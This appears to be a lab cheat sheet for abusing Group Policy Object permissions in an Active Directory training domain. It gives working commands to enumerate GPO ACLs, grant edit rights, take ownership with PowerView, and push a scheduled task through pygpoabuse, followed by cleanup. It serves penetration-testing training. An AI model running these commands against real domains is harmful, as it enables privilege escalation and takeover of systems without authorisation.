GPO ACL abuse means we control the policy object strongly enough to edit it, grant ourselves edit rights, take ownership, or chain into SYSVOL modification. The target object is usually a groupPolicyContainer under CN=Policies,CN=System,DC=ootw,DC=local.
Enumerate GPO permissions
Get-GPO -All | ForEach-Object {
$GpoName = $_.DisplayName
Get-GPPermission -Name $GpoName -All |
Select-Object @{Name='GPO';Expression={$GpoName}},Trustee,TrusteeType,Permission
}
PowerView ACL enumeration
Import-Module .\PowerView.ps1
Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=ootw,DC=local" -ResolveGUIDs |
Where-Object {
$_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteDacl|WriteOwner|CreateChild|WriteProperty"
}
Find one GPO DN
Get-ADObject -LDAPFilter '(objectClass=groupPolicyContainer)' -SearchBase "CN=Policies,CN=System,DC=ootw,DC=local" -Properties displayName |
Select-Object displayName,DistinguishedName
Grant edit rights with native cmdlets
Set-GPPermission -Name "Misconfigured Policy" -TargetName "student" -TargetType User -PermissionLevel GpoEditDeleteModifySecurity
Get-GPPermission -Name "Misconfigured Policy" -All
PowerView owner path
$GpoDN = "CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=ootw,DC=local"
Set-DomainObjectOwner -Identity $GpoDN -OwnerIdentity student
Add-DomainObjectAcl -TargetIdentity $GpoDN -PrincipalIdentity student -Rights All
Linux object check
ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\student" -w 'student' -b "CN=Policies,CN=System,DC=ootw,DC=local" '(objectClass=groupPolicyContainer)' displayName name nTSecurityDescriptor
bloodyAD style path
bloodyAD --host 10.10.10.200 -d ootw.local -u student -p 'student' get object "CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=ootw,DC=local" --attr nTSecurityDescriptor
Abuse after edit rights
pygpoabuse.py "ootw.local/student:student@10.10.10.200" \
-gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" \
-command "cmd.exe /c whoami > C:\\Windows\\Temp\\gpo-acl.txt" \
-taskname "AclTask"
Cleanup
Set-GPPermission -Name "Misconfigured Policy" -TargetName "student" -TargetType User -PermissionLevel None
Notes
Owning or editing the LDAP object is not always enough by itself. Working GPO abuse usually needs the LDAP metadata and the SYSVOL policy files to remain coherent.
WriteDACL is often the best path because we can grant ourselves the exact GPO edit right instead of trying to guess which low-level write will be accepted.